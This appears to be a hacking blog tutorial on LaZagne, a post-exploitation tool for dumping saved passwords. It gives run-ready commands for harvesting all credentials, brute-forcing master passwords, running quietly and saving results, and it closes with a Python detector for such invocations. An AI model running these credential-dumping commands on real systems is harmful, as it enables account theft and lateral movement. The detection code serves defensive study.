Cybermorans
A victim's credentials are a high priority for hackers, since most people reuse passwords. Those credentials can get hackers deeper into a network or into other accounts, but digging through the system by hand to find them is difficult and tedious. LaZagne works on Linux, Windows, and macOS, so anyone can practice using it, and it applies to almost every target.
LaZagne is included in the remote access tool Pupy as a post-exploitation module, but you can also use it standalone. Still in active development, it currently supports enumerating passwords from a large set of Windows applications. Credit for this project goes to:
Harmjoy for KeeThief
n1nj4sec for his mimipy module
Benjamin DELPY for mimikatz
@skelsec for Pypykatz
Moyix for Creddump
N0fat for Chainbreaker
Richard Moore for the AES module
Todd Whiteman for the DES module
mitya57 for secretstorage
You can download the standalone version via GitHub. Once you have it, use the terminal to extract it and move it to your windows-binaries folder in Kali Linux with the commands:
unzip Windows.zip
cd Windows
cp laZagne.exe /usr/share/windows-binaries/
This is probably the best time to point out that you should run the application with full administrative rights, especially if you are hoping to retrieve Wi-Fi and Windows passwords. Once you have launched the program, it automatically displays a series of useful modules that you can use. So let's do this.
Enumerate Passwords
LaZagne is non-interactive and can be run in even the most bare-minimum of shells. It is a post-exploitation tool, which means that to use it, you need to already have access to a host via a shell, or at the minimum, command execution.
Type the following and hit Enter:
lazagne -h
There are a lot of available modules here. To gather Wi-Fi or Windows credentials, run as administrator and maybe specify which module you want to use. LaZagne includes a convenient all option. Obviously, you want all the passwords, so:
lazagne all
We collected quite a few credentials. LaZagne also has a rudimentary brute-forcing capability. If LaZagne is passed a wordlist, it will attempt to brute-force Mozilla master passwords, system hashes, etc. To pass a dictionary file, simply add the path argument:
lazagne all -path wordlist.txt
In just a few words, LaZagne is a lightweight command-line tool designed to help you recover lost or forgotten passwords from the most commonly used browsers, a couple of email clients and some FTP transfer and system administration tools.
LaZagne In-depth Usage
Retrieve version:
laZagne.exe --version
Launch all modules:
laZagne.exe all
Launch only a specific module:
laZagne.exe browsers
Launch only a specific software script (-f for Firefox):
laZagne.exe browsers -f
Write all passwords found into a file (-oN for Normal txt, -oJ for Json, -oA for All):
laZagne.exe all -oN
Get help:
laZagne.exe -h
laZagne.exe browsers -h
Use a file for dictionary attacks (used only when it's necessary: Mozilla Master Password, system hashes, etc.). The file has to be a wordlist in cleartext (no rainbow tables). It has not been optimized to be fast but could be useful for basic passwords:
laZagne.exe all -path file.txt
Change verbosity mode (2 different levels):
laZagne.exe all -vv
Quiet mode (nothing will be printed on the standard output):
laZagne.exe all -quiet -oA
Retrieve passwords on another drive (default: C):
laZagne.exe all -drive D
Note: For Wi-Fi passwords / Windows Secrets, launch it with administrator privileges (UAC Authentication / sudo).
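For the defending side, here is an added example (not part of the original post or of the LaZagne project): a Python triage function that flags process-creation command lines matching the invocations listed above, both by image name and by argument shape. The host names and log records are constructed, and the module and flag sets are limited to the ones shown on this page.

```python
import re

# Module names and flags exactly as they appear in the commands on this page;
# extend MODULES from the tool's own -h output for real coverage (assumption).
MODULES = {"all", "browsers"}
OUTPUT_FLAGS = {"-on", "-oj", "-oa"}        # results written to a file
TOOL_FLAGS = {"-quiet", "-path", "-drive"}  # other tool-specific switches

def tokenize(cmdline):
    """Split a Windows-style command line, keeping quoted paths together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def classify(cmdline):
    """Return the list of reasons a command line resembles LaZagne, or []."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = re.split(r"[\\/]", tokens[0])[-1].lower()
    args = [a.lower() for a in tokens[1:]]
    reasons = []
    if "lazagne" in image:
        reasons.append("image-name")
    # The argument shape does not depend on the file name: module, then flags.
    if args and args[0] in MODULES:
        flags = set(args[1:])
        if flags & OUTPUT_FLAGS:
            reasons.append("module+output-flag")
        if flags & TOOL_FLAGS:
            reasons.append("module+tool-flag")
    return reasons

# Constructed process-creation records (host, command line), not real telemetry.
SAMPLE_EVENTS = [
    ("ws-014", r"C:\Users\Public\laZagne.exe all -oN"),
    ("ws-014", r'"C:\ProgramData\svc update.exe" all -quiet -oA'),
    ("ws-022", r"C:\Temp\helper.exe browsers -f"),  # module only: known gap
    ("ws-031", r"C:\Windows\System32\net.exe use D: \\fs01\share"),
    ("ws-031", r"C:\tools\backup.exe all -drive D"),
]

def triage(events):
    """Return (host, cmdline, reasons) for every event with at least one reason."""
    return [(h, c, r) for h, c in events if (r := classify(c))]

if __name__ == "__main__":
    for host, cmd, reasons in triage(SAMPLE_EVENTS):
        print(f"{host}  {'+'.join(reasons):36}  {cmd}")
```

Argument-shape hits on their own are weak signals and are best correlated with administrator-level execution and with new files written by the -oN/-oJ/-oA options.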
Conclusion
Subscribe to receive notifications of similar posts, where we will be reverse engineering malware and vulnerabilities, as well as covering hacking tools, vectors, stories, tutorials and other Infosec stuff.
Follow me on Twitter for daily Infosec memes and shenanigans.
Morans,
Thank you for taking the time. I hope you learned something new. Like/Share and leave a comment/review and, as always, stay awesome!